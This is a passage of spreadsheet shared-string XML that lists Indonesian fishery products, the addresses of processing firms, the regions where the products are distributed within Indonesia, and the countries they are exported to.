Banjarmasin, Kota Banjar Baru, Kabupaten Kutai Barat, Kabupaten Kutai Kartanegara, Kabupaten Kutai Timur, Kota Balikpapan</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Bakso Ikan Mix Sayuran, Naget Ikan) </t>
  </si>
  <si>
    <t>Kota Pontianak, Kabupaten Kotawaringin Barat, Kabupaten Kotawaringin Timur, Kabupaten Kapuas, Kabupaten Barito Selatan, Kabupaten Barito Utara, Kabupaten Seruyan, Kabupaten Katingan, Kabupaten Pulang Pisau, Kabupaten Gunung Mas, Kabupaten Barito Timur, Kabupaten Murung Raya, Kota Palangka Raya, Kabupaten Barito Kuala, Kabupaten Hulu Sungai Selatan, Kabupaten Hulu Sungai Tengah, Kabupaten Hulu Sungai Utara, Kota Banjarmasin, Kota Banjar Baru, Kabupaten Kutai Kartanegara, Kota Balikpapan, Kota Samarinda</t>
  </si>
  <si>
    <t>Kota Pontianak, Kabupaten Kotawaringin Barat, Kabupaten Kotawaringin Timur, Kabupaten Kapuas, Kabupaten Barito Selatan, Kabupaten Barito Utara, Kabupaten Seruyan, Kabupaten Katingan, Kabupaten Pulang Pisau, Kabupaten Gunung Mas, Kabupaten Barito Timur, Kabupaten Murung Raya, Kota Palangka Raya, Kabupaten Barito Kuala, Kabupaten Hulu Sungai Selatan, Kabupaten Hulu Sungai Tengah, Kabupaten Hulu Sungai Utara, Kota Banjarmasin, Kota Banjar Baru, Kota Balikpapan, Kota Samarinda</t>
  </si>
  <si>
    <t>Udang Fermentasi</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Manyung, Kerapu, Layur, Kakap Merah, Baronang)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Cilacap, Kabupaten Banyuwangi, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Kembung, Lemadang, Layaran, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Cilacap, Kabupaten Banyuwangi, Kota Surabaya</t>
  </si>
  <si>
    <t>Kompleks Pelabuhan Benoa Jl. Ikan Tuna III No.2, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>China, France, Greece, Japan, Korea, Democratic People's Republic of, Malaysia, Portugal, Russian Federation, Singapore, Taiwan, Province of China, Thailand, Ukraine, United States</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemadang, Marlin, Semar, Gindara, Tenggiri, Todak)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramundi, Kakatua, Bawal, Kakap, Kerapu, Ekor Kuning)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Barramundi, Kakatua, Bawal, Kakap, Kerapu, Ekor Kuning)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Terbang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kod, Katamba, Sebelah, Kerapu, Kakatua, Kakap, Kaci-kaci, Guntur, Kurisi, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Terbang, Tenggiri)</t>
  </si>
  <si>
    <t>Balai Layanan Usaha Produksi Perikanan Budidaya (BLUPPB) Karawang, Kel. Pusakajaya Utara, Kec. Cilebar, Kabupaten Karawang&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku (Lele, Mas, Gurami, Mujair, Patin, Nila)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Bandung Barat, Kota Bekasi</t>
  </si>
  <si>
    <t>China, Japan, Malaysia, Philippines, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Lencam, Pisang-pisang, Biji Nangka, Kerapu, Layur, Halibut, Beloso, Kakatua, Kakap, Kaci-kaci, Kuro, Barramundi)</t>
  </si>
  <si>
    <t>Jl. Bypass Ngurah Rai Gang Mina Utama No.10, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Balimong, Janahan, Kakao, Kerapu, Kurisi)</t>
  </si>
  <si>
    <t>Kota Yogyakarta, Kabupaten Badung, Kota Denpasar</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Balimong, Janahan, Kakap, Kerapu, Kurisi)</t>
  </si>
  <si>
    <t>Desa Lobuk, Kel. Lobuk, Kec. Bluto, Kabupaten Sumenep&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Teri Asin Kering</t>
  </si>
  <si>
    <t>Jl. TPI Pulau Baai RT 10 RW 02, Kel. Sumber Jaya, Kec. Kampung Melayu, Kota Bengkulu&lt;br&gt;Bengkulu</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Layur, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Kota Padang, Kota Bandar Lampung, Kota Jakarta Pusat</t>
  </si>
  <si>
    <t xml:space="preserve">UD. SONI </t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kota Depok, Kota Denpasar, Kota Makassar</t>
  </si>
  <si>
    <t>Jl. Muara Baru, Kawasan PPS Nizam Zachman, Blok J No.1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Austria, China, R√©union, United States</t>
  </si>
  <si>
    <t>France, Japan, Netherlands, United States</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemadang, Marlin, Meka, Nike, Gindara, Tenggiri)</t>
  </si>
  <si>
    <t>France, Japan, United States, Viet Nam</t>
  </si>
  <si>
    <t>China, France, Japan, Taiwan, Province of China, United States, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Pahlawan No.1-3, Kel. Dampit, Kec. Dampit, Kabupaten Malang&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Beku (Patin, Nila, Bandeng)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Kerapu, Kakatua, Kakap)</t>
  </si>
  <si>
    <t>Sambal Terasi Udang</t>
  </si>
  <si>
    <t xml:space="preserve">Seafood Bernilai Tambah Beku </t>
  </si>
  <si>
    <t>Seafood Bernilai Tambah Masak Beku</t>
  </si>
  <si>
    <t>Jl. Ir. Sutami KM 12, Desa Lematang, Kec. Tanjung Bintang, Kabupaten Lampung Selatan&lt;br&gt;Lampung 35122</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kod, Yellowfin Sole, Yellowtail Flounder)</t>
  </si>
  <si>
    <t xml:space="preserve">Daging Rajungan Pasteurisasi </t>
  </si>
  <si>
    <t>Pattene Bussines Park Blok U3 B, Kel. Temmapaduae, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>American Samoa, China, Korea, Democratic People's Republic of, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerisi, Kerapu, Kaneke, Pinjalo, Kakap)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Barakuda, Bonito, Marlin, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu, Kaneke, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Barakuda, Bonito, Tenggiri)</t>
  </si>
  <si>
    <t>Cyprus, Italy</t>
  </si>
  <si>
    <t>Jl. Bakau No.60, Kel. Balandai, Kec. Bara, Kota Palopo&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Kabupaten Situbondo</t>
  </si>
  <si>
    <t>Chile, China, Japan, Korea, Democratic People's Republic of</t>
  </si>
  <si>
    <t>Komplek Pelabuhan Perikanan Nusantara Merauke, Kel. Karang Indah, Kec. Merauke, Kabupaten Merauke&lt;br&gt;Papua</t>
  </si>
  <si>
    <t>Ikan Demesal Beku (Kakap Putih, Bawal, Senangin, Manyung)</t>
  </si>
  <si>
    <t>Australia, China, Sri Lanka, Taiwan, Province of China, Thailand, United Kingdom, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Air Tawar Hidup (Betutu)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Kembung, Layang, Tongkol, Cakalang, Tenggiri, Marlin, Layaran)</t>
  </si>
  <si>
    <t>China, Hong Kong, Malaysia, Saudi Arabia, Singapore, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Bawal, Layur, Kakap, Kerapu)</t>
  </si>
  <si>
    <t>China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, United Arab Emirates, Viet Nam</t>
  </si>
  <si>
    <t>Hong Kong, Malaysia, Singapore, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Bambu Runcing No.99, Kel. Pettuadae, Kec. Turikale, Kabupaten Maros&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramundi, Lencam, Sebelah, Kerapu, Layur, Bawal, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>China, Japan, Sri Lanka, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Palem No.52 RT 002 RW 003, Kel. Lingkas Ujung, Kec. Tarakan Timur, Kota Tarakan&lt;br&gt;Kalimantan Utara</t>
  </si>
  <si>
    <t>Jl. Gajah Mada, Kel. Karang Rejo, Kec. Tarakan Barat, Kota Tarakan&lt;br&gt;Kalimantan Utara</t>
  </si>
  <si>
    <t>Kota Tarakan</t>
  </si>
  <si>
    <t>Seafood Bernilai Tambah Beku dan Produk Vegetarian</t>
  </si>
  <si>
    <t>China, Singapore, United Kingdom, United States</t>
  </si>
  <si>
    <t>Jl. Cumi Raya No.3 Muara Baru, Room 302 dan 602, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Amberjack, Sebelah, Kuwe, Halibut, Bawal, Seabream, Kakap, Striped Jack, Ekor Kuning, Seabass)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Amberjack, Sebelah, Kuwe, Kerapu, Halibut, Bawal, Seabream, Kakap, Striped Jack, Ekor Kuning, Seabass)</t>
  </si>
  <si>
    <t>Jl. Raya Perancis Gudang 9 Blok BG-BH, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kawasan Industri Pergudangan &amp; Industri Tunas Bitung Blok B2 No.5 Jl. Raya Serang KM 13,8, Kel. Pasirjaya, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Lousan, Jahan, Kerapu, Layur, Bawal, Kakap, Kurisi, Ekor Kuning)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Makerel, Baby Tuna, Lemuru, Tongkol, Tembang, Japuh, Cakalang)</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Philippines, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Philippines, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lousan, Kerapu, Halibut, Bawal, Kurisi, Layur, Kakap)</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Salem, Tongkol, Kembung, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Kayu Besar Blok K No.4 RT 004 RW 002, Kel. Tegal Alur, Kec. Kalideres, Kota Jakarta Barat&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>China, Sri Lanka, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku (Mujair, Gabus, Nila)</t>
  </si>
  <si>
    <t>Australia, Bangladesh, Cambodia, China, Japan, Korea, Democratic People's Republic of, Myanmar, Taiwan, Province of China, United Kingdom, United States</t>
  </si>
  <si>
    <t>Jl. Raya Nongkojajar Km 1,4, Kel. Cowek, Kec. Purwodadi, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Raya Wonoayu No.26, Kel. Gempol, Kec. Gempol, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Cumi Raya No.3 Muara Baru, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kawasan Industri Modern Cikande, Jl. Utama Modern Industri AA No.1, Kel. Barengkok, Kec. Kibin, Kabupaten Serang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Canada, France, United States</t>
  </si>
  <si>
    <t>Jl. Raya Madidir, Kel. Paceda, Kec. Madidir, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Kota Surabaya, Kota Manado</t>
  </si>
  <si>
    <t>Australia, Egypt, Switzerland, United Kingdom, United States</t>
  </si>
  <si>
    <t>Jl. Raja Wadi Polapa, Kel. Dulomo, Kec. Tilango, Kabupaten Gorontalo&lt;br&gt;Gorontalo</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Baby Tuna, Tongkol, Deho, Kembung, Lemadang, Gindara, Merah, Layaran, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu, Nike, Selayar, Kakap)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Utara, Kabupaten Cirebon, Kabupaten Majalengka, Kota Pontianak</t>
  </si>
  <si>
    <t>Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand</t>
  </si>
  <si>
    <t>Jl. Raya Kendal - Batang Km 12, Kel. Truko, Kec. Kangkung, Kabupaten Kendal&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Bakso Ikan)</t>
  </si>
  <si>
    <t>Kabupaten Kendal, Kabupaten Batang, Kabupaten Pemalang, Kabupaten Tegal, Kota Semarang</t>
  </si>
  <si>
    <t>Cephalopoda Semi Kering</t>
  </si>
  <si>
    <t>BTN Bukit Karema Indah Blok G No.03, Kel. Karema, Kec. Mamuju, Kabupaten Mamuju&lt;br&gt;Sulawesi Barat</t>
  </si>
  <si>
    <t>Kabupaten Mamuju</t>
  </si>
  <si>
    <t>Abon Marlin</t>
  </si>
  <si>
    <t>Jl. Majapahit No.28, Kel. Gedangrowo, Kec. Prambon, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Pergudangan Sentra Kosambi Blok E/16, Kel. Kosambi Timur, Kec. Kosambi, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kabupaten Bandung, Kabupaten Bandung Barat, Kota Bandung, Kota Surabaya, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>China, Malaysia, Philippines, Singapore, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Kalijaga No.173, Kel. Pegambiran, Kec. Lemahwungkuk, Kota Cirebon&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Naget Ikan, Sosis Ikan, Otak-otak Ikan, Kaki Naga, Tahu Ikan, Siomay Ikan, Sick Ikan, Lumpia Ikan, Kekian, Scallop Ikan) </t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Cianjur, Kabupaten Ciamis, Kabupaten Kuningan, Kabupaten Cirebon, Kabupaten Majalengka, Kabupaten Subang, Kabupaten Karawang, Kabupaten Bekasi, Kota Sukabumi, Kota Cirebon, Kota Depok, Kota Tasikmalaya, Kabupaten Cilacap, Kabupaten Pemalang, Kota Magelang, Kota Semarang, Kota Yogyakarta, Kota Malang, Kabupaten Serang</t>
  </si>
  <si>
    <t>Jl. Raya Perancis Komp. Pergudangan 75 Blok K No.4, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Jl. Merpati Kampung Sidojadi, Kel. Batu IX, Kec. Tanjungpinang Timur, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Kabupaten Karimun, Kabupaten Bintan, Kabupaten Natuna, Kabupaten Lingga, Kabupaten Kepulauan Anambas, Kota Batam, Kota Tanjung Pinang</t>
  </si>
  <si>
    <t>Jl. Kanal Victory Komplek Perindustrian, Kota Sorong&lt;br&gt;Papua Barat</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Surabaya, Kota Manado, Kota Makassar</t>
  </si>
  <si>
    <t>Kawasan Industri Karyadeka Pancamurni Kav B3, Kel. Pasirsari, Kec. Cikarang Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Algeria, France, Italy, Japan, Mexico, Portugal, Spain, Thailand</t>
  </si>
  <si>
    <t>Jl. Vand Iskandar Baksir No.17, Kel. Jitra, Kec. Teluk Segara, Kota Bengkulu&lt;br&gt;Bengkulu</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Layur, Bawal)</t>
  </si>
  <si>
    <t>Kota Padang, Kota Bengkulu, Kota Bandar Lampung, Kota Jakarta Pusat</t>
  </si>
  <si>
    <t>Pulau Bulang RT 005 RW 002, Kel. Batu Legong, Kec. Bulang, Kota Batam&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Algeria, France, Italy, Japan, Mexico, Portugal, Spain, Thailand, United States</t>
  </si>
  <si>
    <t>Jl. Dermaga Muara Angke No.20, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Gabus Laut, Kembung, Lemadang, Marlin, Salem, Layaran, Layang, Cakalang, Tenggiri, Pedang)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Lemuru, Tongkol, Kembung, Lemadang, Marlin, Layaran, Layang, Cakalang, Tenggiri, Pedang, Gabus Laut, Teri)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap, Swanggi, Gulama, Lencam, Sebelah, Manyung, Kuwe, Kerapu, Layur, Kakatua, Bawal, Selar, Baronang, Kuro, Kurisi)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Swanggi, Gulama, Lencam, Sebelah, Manyung, Kuwe, Kerapu, Layur, Kakatua, Bawal, Selar, Kakap, Baronang, Kurisi)</t>
  </si>
  <si>
    <t>Jl. Yos Sudarso No.11, Kel. Klatak, Kec. Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kabupaten Banyuwangi, Kabupaten Pasuruan, Kota Denpasar, Kabupaten Lombok Barat, Kabupaten Lombok Tengah</t>
  </si>
  <si>
    <t>Jl. Gabion No. 99 Pelabuhan Perikanan Samudera Belawan, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Kuring, Aso-Aso, Lemuru, Tongkol, Salem, Selayang, Layang)</t>
  </si>
  <si>
    <t>Kota Sibolga, Kota Medan, Kota Padang, Kota Pekanbaru, Kota Jambi, Kota Palembang, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Australia, China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Teluk Serpang No.5, Kel. Sumber Jaya, Kec. Kampung Melayu, Kota Bengkulu&lt;br&gt;Bengkulu</t>
  </si>
  <si>
    <t>Kota Padang, Kota Lubuklinggau, Kota Bengkulu, Kota Bandar Lampung</t>
  </si>
  <si>
    <t>Udang Masak Beku</t>
  </si>
  <si>
    <t>France, Germany, Netherlands</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Beku (Patin, Nila)</t>
  </si>
  <si>
    <t>Germany, Italy, Netherlands, Portugal, Singapore, Thailand</t>
  </si>
  <si>
    <t>Japan, Taiwan, Province of China, United States</t>
  </si>
  <si>
    <t>Jl. Raya Surabaya Malang Km 38, Kel. Karangrejo, Kec. Gempol, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ekstrak Ikan</t>
  </si>
  <si>
    <t>Kabupaten Sidoarjo, Kabupaten Sumenep</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Bandung, Kota Surabaya</t>
  </si>
  <si>
    <t>Japan, Timor-Leste</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Nike)</t>
  </si>
  <si>
    <t>Kota Padang, Kota Bengkulu, Kota Bandar Lampung</t>
  </si>
  <si>
    <t>Patemon RT 002 RW 001, Kel. Patemon, Kec. Bojongsari, Kabupaten Purbalingga&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Kota Palembang, Kota Jakarta Selatan, Kabupaten Banyumas, Kabupaten Purbalingga, Kabupaten Bantul, Kabupaten Sleman, Kota Tangerang, Kota Denpasar</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Otak-Otak Ikan, Bakso Ikan, Nugget Ikan)</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Bekasi, Kabupaten Banyumas, Kabupaten Purbalingga, Kota Semarang, Kota Tangerang</t>
  </si>
  <si>
    <t>Cephalopoda Bernilai Tambah Beku (Cumi-cumi Berlapis Tepung, Naget Seafood)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Pusat</t>
  </si>
  <si>
    <t>Jl. Pangeran Ratu Pasar Induk Jakabaring A-1 RT 025 RW 009, Kel. 15 Ulu, Kec. Jakabaring, Kota Palembang&lt;br&gt;Sumatera Selatan</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Mata Besar, Tongkol, Makerel, Sarden)</t>
  </si>
  <si>
    <t>Kampung Bahari RT 12 RW 03, Kel. Sumber Jaya, Kec. Kampung Melayu, Kota Bengkulu&lt;br&gt;Bengkulu</t>
  </si>
  <si>
    <t>Kota Bengkulu, Kota Bandar Lampung, Kota Jakarta Selatan</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Sarden, Layang)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Kembung, Sarden, Layang)</t>
  </si>
  <si>
    <t>Dermaga Desa Laha, Kel. Laha, Kec. Teluk Ambon, Kota Ambon&lt;br&gt;Maluku</t>
  </si>
  <si>
    <t>Jl. Baru Tugu Adipura No.9, Kel. Paniki Bawah, Kec. Mapanget, Kota Manado&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Dusun Damai Indah, Kel. Alue Dua, Kec. Langsa Baro, Kota Langsa&lt;br&gt;Aceh</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Kantor Perusahaan Umum Perikanan Indonesia Unit Natuna, Pelabuhan Perikanan Selat Lampa, Kel. Sabang Mawang Balai, Kec. Pulau Tiga, Kabupaten Natuna&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Jahan, Manyung, Anggoli, Kerapu, Kakap)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Anggoli, Kerapu, Kakap, Ekor Kuning)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Semarang</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Deho, Selayang, Layang, Tamban, Cakalang)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Deho, Selayang, Layang, Tamban, Cakalang)</t>
  </si>
  <si>
    <t>Desa Waplau, Kec. Waplau, Kabupaten Buru&lt;br&gt;Maluku</t>
  </si>
  <si>
    <t>Jl. Raya Maumbi Jaga XVI, Kel. Mapanget, Kec. Talawaan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Jl. Mahendradatta No.15E-F, Kel. Padangsambian, Kec. Denpasar Barat, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Malong, Sebelah, Kerapu, Gerot-gerot, Layur, Kakap, Baronang, Kurisi, Ekor Kuning)</t>
  </si>
  <si>
    <t>Kabupaten Tabanan, Kabupaten Badung, Kabupaten Gianyar, Kota Denpasar</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Malong, Sebelah, Kerapu, Gerot-gerot, Layur, Kakap, Baronang, Kurisi, Ekor Kuning)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Amberjack, Lemuru, Barakuda, Capelin, Makerel, Semar, Gindara, Salem, Pollock, Sarden, Cakalang)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Amberjack, Lemuru, Barakuda, Capelin, Makerel, Semar, Gindara, Salem, Pollock, Sarden, Cakalang)</t>
  </si>
  <si>
    <t>PT LF Service Indonesia, Jl. Jawa Kav A1-1 Kawasan Industri MM2100, Kel. Mekarwangi, Kec. Cikarang Barat, Kabupaten Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>MInyak Ikan Omega 3</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Pati, Kota Surabaya, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>PT LF Service Indonesia, Jl. Jawa Kav A1-1 Kawasan Industri MM2100 , Kel. Mekarwangi, Kec. Cikarang Barat, Kabupaten Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kakap Putih, Bawal Hitam, Malong, Sebelah, Senangin, Kerapu)</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Ebi Fritter, Ebi Furai, Ebi Katsu, Crab Cake, Calamari)</t>
  </si>
  <si>
    <t>Kabupaten Pati, Kabupaten Semarang</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Gudang PPI No. 52, 53, dan 54, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Semar, Salem, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Raya Gilang No. 170, Kel. Gilang, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Gudang PPI No.52, 53 dan 54, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Layur, Bawal, Kakap, Mata Besar, Malong, Lencam, Sebelah)</t>
  </si>
  <si>
    <t>Jl. Janis (Perum BRI No.02), Kel. Klamana, Kec. Sorong Timur, Kota Sorong&lt;br&gt;Papua Barat</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Makassar</t>
  </si>
  <si>
    <t>Jl. Pelabuhan Baru, Kel. Bagan Barat, Kec. Bangko, Kabupaten Rokan Hilir&lt;br&gt;Riau</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Senangin, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Layur, Jenaha)</t>
  </si>
  <si>
    <t>Jl. Datuk Laksamana Gg. Mawar No.02, Kel. Dumai Kota, Kec. Dumai Kota, Kota Dumai&lt;br&gt;Riau</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Manyung, Layur, Jenaha)</t>
  </si>
  <si>
    <t>Pelabuhan Perikanan Untia, Kel. Untia, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Katamba, Kerapu, Kakatua, Pinjalo, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Katamba, Kerapu, Kakatua, Pinjalo, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>China, Japan, Malaysia, Singapore, United States</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku (Gurami, Bandeng)</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku (Gurami)</t>
  </si>
  <si>
    <t>Madulegi RT 04 RW 10, Kel. Plintahan, Kec. Pandaan, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Samosa Ikan)</t>
  </si>
  <si>
    <t>Kota Semarang, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Malang, Kota Pasuruan, Kota Mojokerto, Kota Surabaya</t>
  </si>
  <si>
